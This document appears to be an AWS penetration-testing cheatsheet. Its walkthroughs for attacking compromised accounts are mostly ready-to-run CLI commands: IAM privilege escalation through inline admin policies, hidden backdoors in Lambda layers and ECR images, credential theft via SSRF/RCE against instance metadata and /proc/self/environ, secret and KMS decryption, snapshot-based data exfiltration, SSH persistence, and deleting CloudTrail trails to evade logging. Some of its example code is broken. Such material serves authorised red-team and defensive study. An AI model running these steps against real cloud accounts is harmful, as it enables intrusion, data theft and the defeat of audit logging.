InternalAllTheThings/docs/cloud/aws/AWS Pentest.md

# Cloud - AWS

## AWSome Pentesting Cheatsheet

* Created by pop3ret

## ARN

A number to identify an object in AWS

Example

```
arn:aws:iam:100:user/admin
```

1. Field -> ARN
2. Field -> Type, most of time will be AWS
3. Field -> service, in this case IAM
4. Field -> User ID 
5. Field -> entity identifier

## IAM
*  It's assumed that we have gain access to the AWS Credentials
*  We can see if we have permissions using [Amazon's policy simulator](https://policysim.aws.amazon.com/)
*  Always look for policies and roles with the * symbol.
*  See which user do not have MFA enabled
*  User enumeration in IAM Panel and group enumeration
*  We can also enumerate roles from the same interface
*  Root user is super admin

## Configure AWS cli

```
aws configure
```

Or configure it using a profile

```
aws configure --profile example_name
```

The credential file is located in `~/.aws/credentials`

## Listing IAM access Keys

```
aws iam list-access-keys
```

## 1. Enumerating IAM users

### Checking credentials for the user

```
aws sts get-caller-identity
```

### Listing IAM Users

```
aws iam list-users
```

### Listing the IAM groups that the specified IAM user belongs to 

```
aws iam list-groups-for-user --user-name user-name
```

### Listing all managed policies that are attached to the specified IAM user 

```
aws iam list-attached-user-policies --user-name user-name
```

### Listing the names of the inline policies embedded in the specified IAM user 

```
aws iam list-user-policies --user-name user-name
```

## 2. Enumerating Groups IAM

### Listing IAM Groups

```
aws iam list-groups
```

### Listing all managed policies that are attached to the specified IAM Group 

```
aws iam list-attached-group-policies --group-name group-name
```

### Listing the names of the inline policies embedded in the specified IAM Group

```
aws iam list-group-policies --group-name group name
```

## 3. Enumerating Roles

### Listing IAM Roles

```
aws iam list-roles
```

### Listing all managed policies that are attached to the specified IAM role 

```
aws iam list-attached-role-policies --role-name role-name
```

### Listing the names of the inline policies embedded in the specified IAM role 

```
aws iam list-role-policies --role-name role-name
```

## 4. Enumerating Policies

### Listing of IAM Policies

```
aws iam list-policies
```

### Retrieving information about the specified managed policy 

```
aws iam get-policy --policy-arn policy-arn
```

### Listing information about the versions of the specified manages policy 

```
aws iam list-policy-versions --policy-arn policy-arn
```

### Retrieving information about the specific version of the specified managed policy 

```
aws iam get-policy-version --policy-arn policy-arn --version-id version-id
```

### Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role 

```
aws iam get-user-policy --user-name user-name --policy-name policy-name

aws iam get-group-policy --group-name group-name --policy-name policy-name

aws iam get-role-policy --role-name role-name --policy-name policy-name
```

## 5. Exploitation Scenario

### General Guidelines
* AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it. 

### Enumerating the owner of the key and initial compromise

```
aws sts get-caller-identity
```

Or specifing a profile

```
aws sts get-caller-identity --profile example_name
```

If you have the password of the root account instead of key, log in

```
https://signin.aws.amazon.com/console
```

Or use the IAM in case the account is not the root

```
https://account-id-here.signin.aws.amazon.com/console
```

*The account id can be cathered using the sts get caller command.*

### Privilege Escalation 
* Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges.

#### Study Case
* A user was compromised with the *List Policy* and *Put User Policy* permissions, an attacker could leverage this *Put User* privilege to add an inline administrator to itself, making it administrator of the instance.

##### Exploitation
1. Getting the IAM user

```
aws sts get-caller-identity
```

2. Listing policies attached to a user

```
aws iam list-attached-user-policies --user-name example_name -- profile example_profile
```

3. Retrieving information about a specific policy

```
aws iam get-policy --policy-arn policy_arn
```

If there are more than one version of the policy, we can also list them

```
aws iam list-policy-versions --policy-arn policy_arn
```

Now we can finally retrieve the contents of the policy

```
aws iam get-policy-version --policy-arn example_arn --version-id id_example
```

*It's important to use the command above to check the information about the default policy*

4. Escalation

If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user. 

Administrator policy example

```json
{
	"Version": "2021-10-17",
	"Statement" : [
		{
			"Effect":"Allow",
			"Action": [
				"*"
			],
			"Resource":[
				"*"
			]
		}
	]
}
```

### Attaching this policy into our user

```
aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json
```

### Listing inline policies of our user

```
aws iam list-user-policies --user-name example_name
```

### Listing a restricted resource (Example S3)

```
aws s3 ls --profile example_profile
```

### Interesting Permissions

* iam:AttachUserPolicy -> Attach a policy to a user
* iam:AttachGroupPolicy -> Attach a policy to a group
* iam:AttachRolePolicy -> Attach a policy to a role 
* iam:CreateAccessKey -> Creates a new access key
* iam:CreateLoginProfile -> Creates a new login profile 
* iam:UpdateLoginProfile -> Update an existing login profile
* iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile
* iam:PuserUserPolicy -> Create/Update an inline policy
* iam:PutGroupPolicy -> Create/Update an inline policy for a group
* iam:PutRolePolicy -> Create/Update an inline policy for a role 
* iam:AddUserToGroup -> Add an user to a group
* iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role 
* iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it
* lambda:UpdateFunctionCode -> Update the code of an existing lambda function

### Persistence & Backdooring
* Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access. 

#### Creating a new access key for another user

```
aws iam create-access-key --username example_username
```

#### Configuring AWS cli for the new user

```
aws configure --profile example_profile
```

*Remember, an user can have the maximum of 2 access keys*.

#### Testing the credential

```
aws sts get-caller-identity --profile example_profile
```

#### Accessing more credentials
* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)

##### Listing managed policies attached to a user

```
aws iam list-attached-user-policies --user-name example_name
```

##### Retrieving information about a specific policy

```
aws iam get-policy --policy-arn ARN
```

##### Listing information about the version of the policy

```
aws iam list-policy-versions --policy-arn ARN
```

##### Retrieving information about a specific version

```
aws iam get-policy-version --policy-arn policy_arn --version-id ID
```

##### Listing IAM roles

```
aws iam list-roles
```

##### Listing trust relationship between role and user (Which roles we can assume)

```
aws iam get-role --role-name role_name
```

##### Listing all managed policies attached to the specific IAM role

```
aws iam liast-attached-role-policies --role-name role_name
```

##### Retrieving information about the specified version of the policy 

```
aws iam get-policy-version --policy-arn policy_arn --version-id ID
```

##### Getting temporary credentials for the role

```
aws sts assume-role --role-arn role_arn --role-session-name session_name
```

##### Configuring AWS cli with newer credentials (On Linux)

```
export AWS_ACCESS_KEY_ID
export AWS_SECRET_KEY
export AWS_SESSION_TOKEN
```

##### Getting information about the temporary credential

```
aws sts get-caller-identity
```

## S3 - Simple Storage System

* Storage system that allows users to store and retrieve data.
* List,Get,Put and Delete operations can be performed on the objects of the bucket
* Buckets are global, meaning that they are available to all regions
* It's possible to bruteforce the bucket name and region in the URL
* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level
* There is also time limited URL's and identity-based policies
* Identity policies are enumerated using IAM commands

## Enumeration

### Listing all buckets in aws account

```
aws s3api list-buckets
```

### Getting information about a specific bucket

```
aws s3api get-bucket-acl --bucket name
```

### Getting information about a specific bucket policy

```
aws s3api get-bucket-policy --bucket name 
```

### Getting the Public Access Block configuration for an S3 bucket

```
aws s3api get-public-access-block --bucket name
```

### Listing all objects in a specific bucket

```
aws s3api list-objects --bucket name
```

### Getting ACL information about a specific object

```
aws s3api get-object-acl --bucket-name name --key object_name
```

## Data Exfiltration
* It's possible to brute-force files in the bucket
* If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL.

### Public Access

* Just enter the URL in the browser

```
https://bucket-name.region.amazonaws.com/secret.txt
```

### Authenticated User

```
aws s3api get-object --bucket name --key object-name download-file-location
```

### Time-Based Url

* Generate a time-based url for an object
* Userful if the object is not public

```
aws s3 presign s3://bucket-name/object-name --expires-in 605000
```

## Lambda & API Gateway
* Serverless event-driven platform
* Runs code in response to events and automatically manages computing resources required by that code
* Can trigger from other AWS services or call directly from the API Gateway
* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source
* API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API
* API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way.
* If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files.
* If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL).

## Enumeration

### Listing All lambda functions

```
aws lambda list-functions
```

### Listing information about a specific lambda function

```
aws lambda get-function --function-name function_name
```

* *This command enables us to download the source code of the lambda function*

### Listing policy information about the function

```
aws lambda get-policy --function-name function_name
```

* We can get information like who can execute this functions, ID and other information with this command

### Listing the event source mapping information about a lambda function

```
aws lambda list-event-source-mappings --function-name function_name
```

### Listing Lambda Layers (Depedencies)

```
aws lambda list-layers
```

### Listing full information about a lambda layer

```
aws lambda get-layer-version --layer-name name --version-number version_number
```

### Listing Rest API'S

```
aws apigateway get-rest-apis
```

### Listing information about a specific API

```
aws apigateway get-rest-api --rest-api-id ID
```

### Listing information about endpoints

```
aws apigateway get-resources --rest-api-id ID
```

### Listing information about a specific endpoint

```
aws apigateway get-resource --rest-api-id ID --resource-id ID
```

### Listing method information for the endpoint

```
aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
```

* Test various methods to see if the API supports it.

### Listing all versions of a rest api 

```
aws apigateway get-stages --rest-api-id ID
```

### Getting informatin about a specific version 

```
aws apigateway get-stage --res-api-id ID --stage-name NAME
```

### Listing API KEYS

```
aws apigateway get-api-keys --include-values
```

### Getting information about a specific API Key

```
aws apigateway get-api-key --api-key KEY
```

## Initial Access

* It's possible to get RCE through API Gateway if it executes commands.
* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env`, configure `aws cli` and proceed with the exploitation.

## Credential Access

Getting credentials from Lambda can be done in 2 ways

1. Keys in the source code
2. Keys in the environment variables

These keys can be gathered using SSRF, RCE and so on.

### Getting credentials using RCE

```
https://apigateway/prod/system?cmd=env
```

### Getting credentials using SSRF

```
https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next
```

### Getting credentials using SSRF and wrappers

```
https://apigateway/prod/system?cmd=file:///proc/self/environ
```

### Getting credentials from lambda environment variables (cli)

```
aws lambda get-function --function-name NAME
```

* It's important to enumerate the functions first with `aws lambda list-functions`

## Persistence
* If the user has sufficient rights in the lambda function, it's possible to download the source code, add a backdoor to it and upload. Every time the lambda executes, the malicious code will also execute.
* Always try to update the code of layers (dependencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.

### Checking which user is executing  

```
aws sts get-caller-identity
```

### Checking all managed policies attached to the user

```
aws iam list-attached-user-policies --user-name user_name
```

### Checking informations about a specific policy

```
aws iam get-policy-version --policy-arn arn --version-id ID
```

### Listing all lambda functions

```
aws lambda list-functions --region region
```

### Listing information about the specified lambda

```
aws lambda get-function --function-name name
```

* Download and analyze the codes

### Listing policy information about the specific lambda function

```
aws lambda get-policy --function-name name --profile profile --region region
```

* We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function).

### Listing Rest API'S

```
aws apigateway get-rest-apis
```

### Listing information about a specific API

```
aws apigateway get-rest-api --rest-api-id ID
```

### Listing information about endpoints

```
aws apigateway get-resources --rest-api-id ID
```

### Listing information about a specific endpoint

```
aws apigateway get-resource --rest-api-id ID --resource-id ID
```

### Listing method information for the endpoint

```
aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
```

* Test various methods to see if the API supports it.

### Listing all versions of a rest api 

```
aws apigateway get-stages --rest-api-id ID
```

### Getting informatin about a specific version 

```
aws apigateway get-stage --res-api-id ID --stage-name NAME
```

### Uploading the backdoor code to aws lambda function

```
aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip
```

### Invoke the Function

```
curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE
```

Where

1. API-ID -> uj3948ie
2. Region -> us-east-2
3. Resource (Endpoint) -> EXAMPLE
4. Method -> Get
5. Stage (Version) -> default
6. API-Key -> None

*All these details are gathered during the enumeration.*

## Privilege Escalation
* If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator.

### Create a lambda function and attach a role to it

```
aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region
```

* Inside the function's code, we will add the administrator permission to the role and to the user

#### Example code to add the permissions

```python
import boto3
import json

def handler(event,context)
	iam = boto3.client("iam")
	iam.attach.role.policy(RoleName="name",PolicyArn="arn",)
	iam.attach.user.policy(UserName="name",PolicyArn="arn",)
	return {
		'statusCode':200
		'body':json.dumps("Pwned")
	}
```

### Invoke a lambda function

```
aws lambda invoke --function-name name response.json --region region 
```

### Listing managed policies to see if the change worked

```
aws iam list-attached-user-policies --user-name user_name
```

## AWS Secret Manager

* AWS Service that encrypts and stores secrets
* Transparently decrypts and returns in plaintext
* KMS used to store keys (AWS Key and Customer Managed Key)
* Asymmetric and Symmetric keys can be created using KMS


## Enumeration

### Listing all secrets stored by Secret Manager

```
aws secretsmanager list-secrets
```

### Listing information about a specific secret

```
aws secretsmanager describe-secret --secret-id name
```

### Getting policies attached to the specified secret

```
aws secretsmanager get-resource-policy --secret-id ID
```

### Listing keys in KMS

```
aws kms list-keys
```

### Listing information about a specific key

```
aws kms describe-key --key-id ID
```

### Listing policies attached to a specific key

```
aws kms list-key-policies --key-id ID
```

### Getting full information about a policy

* Shows who can access the keys

```
aws kms get-key-policy --policy-name name --key-id ID
```

## Credential Exfiltration 

* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API

### Listing policies attached to a user

```
aws iam list-attached-user-policies --user-name name
```

### Retrieving information about a specific version of the policy

* Here we can see the permissions

```
aws iam get-policy-version --policy-arn arn --version-id id
```

### Listing all secrets stored by the Secret Manager

```
aws secretsmanager list-secrets
```

### Listing information about a specific secret

* Here we get the secret Key Id to describe the secret

```
aws secretsmanager describe-secret --secret-id name
```

### Getting resource-based policy attached to a specific secret

```
aws secretsmanager get-resource-policy --secret-id ID
```

### Getting the secret value

* Retrieves the actual value

```
aws secretsmanager get-secret-value --secret-id ID
```

### KMS

* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.

#### Listing a specific key 

```
aws kms describe-key --key-id id
```

#### Listing policies attached to a specified key

* Here we can see who can access the key, the description of it and so on

```
aws kms list-key-policies --key-id ID
```

#### Listing full information about a policy

* Run the previous command in all keys to see who can access it

```
aws kms get-key-policy --policy-name name --key-id ID
```

#### Decrypt the secret using the key

* There is no need to specify the key information because this information is embedded in the encrypted file

```
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
```

## Containers

Divided into three categories

* Registry -> Secure place to store container images (ECR)
* Orchestration -> Configure when and where the containers run (ECS, EKS)
* Compute -> Use to do computing-related tasks (EC2, Fargate)
* Is it possible to create a backdoor image and add to a EKS  cluster
* Always look how VPC's are communicating with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster

## Initial Access

* The initial access can be done by exploiting some RCE in web app to get access to the container, afterwards it's possible to compromise the EC2. 

After the RCE, we can list all secrets in EKS

```
https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount
```

### Getting the secret information from EKS

```
https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token
```

* It's also possible to do sandbox escaping (Tool: ``deepce``)

## Enumeration

### ECR

#### Listing all repositories in container registry

```
aws ecr describe-repositories
```

#### Listing information about repository policy

```
aws ecr get-repository-policy --repository-name name
```

#### Listing all images in a specific repository

```
aws ecr list-images --repository-name name
```

#### Listing information about an image

```
aws ecr describe-images --repository-name name --images-ids imageTag=name
```

### ECS

#### Listing all ECS clusters

```
aws ecs list-clusters
```

#### Listing information about a specific cluster

```
aws ecs describe-clusters --cluster name
```

#### Listing all services in a specified cluster

```
aws ecs list-services --cluster name
```

#### Listing information about a specific service

```
aws ecs descibe-services --cluster name --services name
```

* This command shows the logs of the service

#### Listing tasks in a specific cluster

```
aws ecs list-tasks --cluster name
```

#### Listing information about a specific task

```
aws ecs describe-tasks --cluster name -tasks taskArn
```

* Also shows information about network, userful if trying to pivot

#### Listing all containers in a specified cluster

```
aws ecs list-container-instances --cluster name
```

### EKS

#### Listing all EKS clusters

```
aws eks list-clusters
```

#### Listing information about a specific cluster

```
aws eks describe-cluster --name name
```

#### Listing all node groups in a specified cluster

```
aws eks list-nodegroups --cluster-name name
```

#### Listing specific information about a node group in a cluster

```
aws eks describe-nodegroup --cluster-name name --nodegroup-name name
```

#### Listing Fargate in a specified cluster

```
aws eks list-fargate-profiles --cluster-name cluster-name
```

#### Listing information about a fargate profile in a cluster

```
aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name
```

## Persistence

* It's possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server.

### Enumerating the user

```
aws sts get-caller-identity
```

### Listing manager policies attached to the IAM role

```
aws iam list-attached-role-policies --role-name name
```

### Getting information about the version of the managed policy

```
aws iam get-policy-version --policy-arn arn --version-id id
```

### Getting information about the repositories in container registry

```
aws ecr describe-repositories
```

### Listing all images in the repository

```
aws ecr list-images --repository-name name
```

### Listing information about an image

```
aws ecr describe-images --repository-name name --image-ids imageTag=Name
```

### Authenticate the docker daemon to ECR

```
aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address
```

### Building images with backdoor

```
docker build -t image_name
```

### Tagging the docker image

```
docker tag image_name ecr_addr:Image_Name
```

### Pushing the image to ECR

```
docker push ecr_addr:Image_Name
```

## EC2

* AMI, images used to create virtual machines
* It's possible to create a malicious image to compromise users
* We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager
* The SSH Key method is permanent, we need to gather the private key to connect to the instance
* EC2 Instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance
* Session manager only work in browser and it does not need SSH Key
* Windows machines can be accessed by using RDP, Session Manager
* Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level.

## Enumeration

### Listing information about all instances

```
aws ec2 describe-instances
```

### Listing information about a specific region

```
aws ec2 describe-instances --region region
```

### Listing information about specific instance

```
aws ec2 describe-instances --instance-ids ID
```

### Extracting UserData attribute of specified instance

```
aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID
```

*This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded*

### Listing roles of an instance

```
aws ec2 describe-iam-instance-profile-associations
```

## Exploitation
* Initial access can happen by RCE or SSRF
* Metadata can be used to exfiltrate information from the instance

### Remote code execution

#### AWS Metadata
If we have remote code execution or SSRF, we can grab metadata information

```
curl http://169.254.169.254/latest/meta-data
```

##### Grabbing the keys to access the instance

```
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
```

##### Grabbing the keys in metadata version 2 

```bash
TOKEN=`curl
X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/meta-data/
```

#### AWS Userdata

Version 1

```
curl http://169.254.169.254/latest/user-data/
```

Version 2

```bash
TOKEN=`curl
X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data/
```

### Privilege Escalation
* One approach to get a shell in an instance is to put a reverse shell in UserData attribute, when the  instance is launched, we will have the connection.
* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.

#### Getting information about the key

```
aws sts get-caller-identity
```

#### Getting policies attached to the IAM user

```
aws iam list-attached-user-policies --user-name user_name
```

#### Getting information about a specific policy version

```
aws iam get-policy-version --policy-arn ARN --version-id ID
```

To attach a role to an EC2 instance, we can use the RCE to grab the ID

```
curl http://169.254.169.254/latest/meta-data/instance-id
```

#### Listing instance profiles

```
aws iam list-instance-profiles
```

#### Attach an instance profile to an EC2 instance

```
aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName
```

### Credential Access

* We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on)

#### After the initial access
1. Enumerate the key (Role)

```
aws sts get-caller-identity
```

2. If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2)

```
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND
```

3. Configure the aws cli

```
aws configure 
```

Or use environment variables.

### Persistence
* All the persistence techniques works here, SSH persistence, vim backdoor and so on.

#### SSH Persistence example

1. Generate SSH Key pair

```
ssh-keygen
```

2. Add public key to authorized_keys

```
echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys
```

3. Use the private key to connect 

```
ssh -i public_key user@instance
```

# Elastic Block Store
* Block storage system used to store persistent data
* It's possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable).
* It's possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot.
* It's possible to attach the snapshot (Backup of BS) to an EC2 instance
* Snapshots can be used as volumes or AMI's

## Enumeration

### Enumerating EBS volumes

```
aws ec2 describe-volumes
```

* If the volume is available, it can be attached to an EC2 instance
* Check if the EBS is encrypted

### Enumerating Snapshots

```
aws ec2 describe-snapshots --owner-ids self 
```

* Also check if the snapshot is encrypted

## Exploitation & Data Exfiltration
* Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance. 
* User need to have IAM permissions on EC2
* Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine.

### Creating a snapshot of a specified volume

```
aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name
```

### Listing snapshots

```
aws ec2 describe-snapshots
```

### Creating a volume from a snasphot

```
aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name
```

* The volume needs to be in the same availability zone as the instance we have access

### Attaching the volume to an instance

```
aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value
```

### Mounting the volume

```
sudo mount /dev/sdfd /directory
```

After mounting, we will have access to the disk. 

# RDS - Relational Database Service

* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)
* The access is done by using password, password+IAM or password+kerberos
* It's possible to restrict access using restrictions such as specific EC2 or lambda or use network-level restrictions such as vpc, ip.
* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.

## Enumeration

### Listing information about clusters in RDS

```
aws rds describe-db-clusters
```

### Listing information about RDS instances

```
aws rds describe-db-instances
```

* IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance

### Listing information about subnet groups in RDS

```
aws rds describe-db-subnet-groups
```

### Listing information about database security groups in RDS

```
aws rds describe-db-security-groups
```

### Listing information about database proxies 

```
aws rds describe-db-proxies
```

## Data exfiltration

* If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect)

### List instances in RDS

```
aws rds describe-db-instances
```

### List information about the specified security group

```
aws ec2 describe-security-groups --group-ids id
```

### Password-based authentication

```
mysql -h hostname -u name -P port -p password
```

### IAM Based authentication

**1. Identify the user**

```
aws sts get-caller-identity
```

**2. List all policies attached to a role**

```
aws iam list-attached-role-policies --role-name name
```

**3. Get information about a specific version of a policy**

```
aws iam get-policy-version --policy-arn arn --version-id ID
```

**4. Get a temporary token from the RDS**

```
aws rds generate-db-auth-token --hostname hostname --port port --username username --region region
```

* To be easier, we can put it in a variable

```
TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region)
```

**5. Connect to the DB using the token**

```
mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN
```

## SSO & Other Services

## Single Sign On (SSO)

* Used to manage access to multiple AWS accounts and applications centrally. 
* Provide users a way to interact with all services and applications through one place
* Can be used to manage access and user permissions to all AWS accounts
* The identity source can use AWS SSO's identity store or external identity store (Okta, SAML and similar)

## CloudTrail

* Log monitoring service, allows us to continuously monitor and retain account activity related to actions in our AWS account 
* Provide event history of AWS account activity, SDKs, command line tools and other services
* Commonly used to detect unusual behavior in AWS account
* Pacu automatically changes the user agent to deceive the logs of cloudtrail

### Userful Commands

#### List trails

```
aws cloudtrail list-trails
```

#### Disabling CloudTrail

```
aws cloudtrail delete-trail --name example_trail --profile name
```

#### Disable monitoring of events from global events

```
aws cloudtrail update-trail --name example_trail --no-include-global-service-event
```

#### Disable CloudTrail on specific regions

```
aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
```

## AWS Shield

* Used to protect services from Denial of Service Attacks
* There are 2 versions, the standard and the Advanced

## AWS Waf

* Used to protect applications against common web application attacks 
* Common WAF bypasses can be tested against it
* To detect a WAF, we can use `wafw00f`

## AWS Inspector

* Automated security assessment service that helps improve the security and compliance of applications on AWS
* Works with an agent 

## AWS Guard Duty 

* Threat detection service that monitors for malicious activity and unauthorized behavior
* Works by collecting and analyzing logs

## Virtual Private Cloud

* Used to create an isolated infrastructure within the cloud, including subnets and so on.
* If the VPC has an internet gateway, means it is a public subnet
* Every VPC can have Network ACL's

## Routing Tables 

A set of rules to determine where the traffic will be directed, comes in the form of Destination and Target, defined as follows

```
DESTINATION TARGET

IP          local -> VPC Internal
IP          igw   -> Internet Gateway
IP          nat   -> NAT Gateway
IP          pcx   -> VPC Peering
IP          vpce  -> VPC Endpoint
IP          vgw   -> VPN Gateway
IP          eni   -> Network Interface
```

* VPC Internal -> Internal IP, no internet connection
* Internet Gateway -> Used to access the internet
* NAT Gateway -> Does the NAT between machines, allows one-way connection to the internet
* VPC Peering -> Allows the communication between 2 VPC's
* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)
* VPN Gateway -> Used to expand the cloud to on premises and vice-versa
* Network Interface -> Network Interfaces

## Enumeration

### Listing VPC's

```
aws ec2 describe-vpcs
```

### Listing VPC's specifying the region

```
aws ec2 describe-vpcs --region us-west-1
```

### Listing VPC information by ID

```
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
```

### Listing subnets

```
aws ec2 describe-subnets
```

### Listing subnets by VPC-id

```
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
```

### Listing routing tables

```
aws ec2 describe-route-tables
```

### Listing routing tables by VPC-id

```
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
```

### Listing Network ACL's

```
aws ec2 describe-network-acls
```

## Lateral Movement and Pivoting 

* We can abuse VPC peering to do lateral movement

### Scenario

* There are 3 VPC's -> A,B,C 
* A can access B through peering and B access C. We can use VPC B as a peering pivot to access VPC C from VPC A.
* The lateral movement can be done if we gather keys or other machines 
* Always enumerate the subnets to see in which subnet we can access other VPC's

#### Listing VPC peering connections

```
aws ec2 describe-vpc-peering-connections
```

#### Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC's)

```
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
```

#### Listing routing tables

```
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
```

#### Listing instances on the specified VPC ID

```
aws ec2 describe-instances --filters "Name=vpc-id,Values=ID"
```

#### Listing instances on the specified subnet

```
aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
```

## References

* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)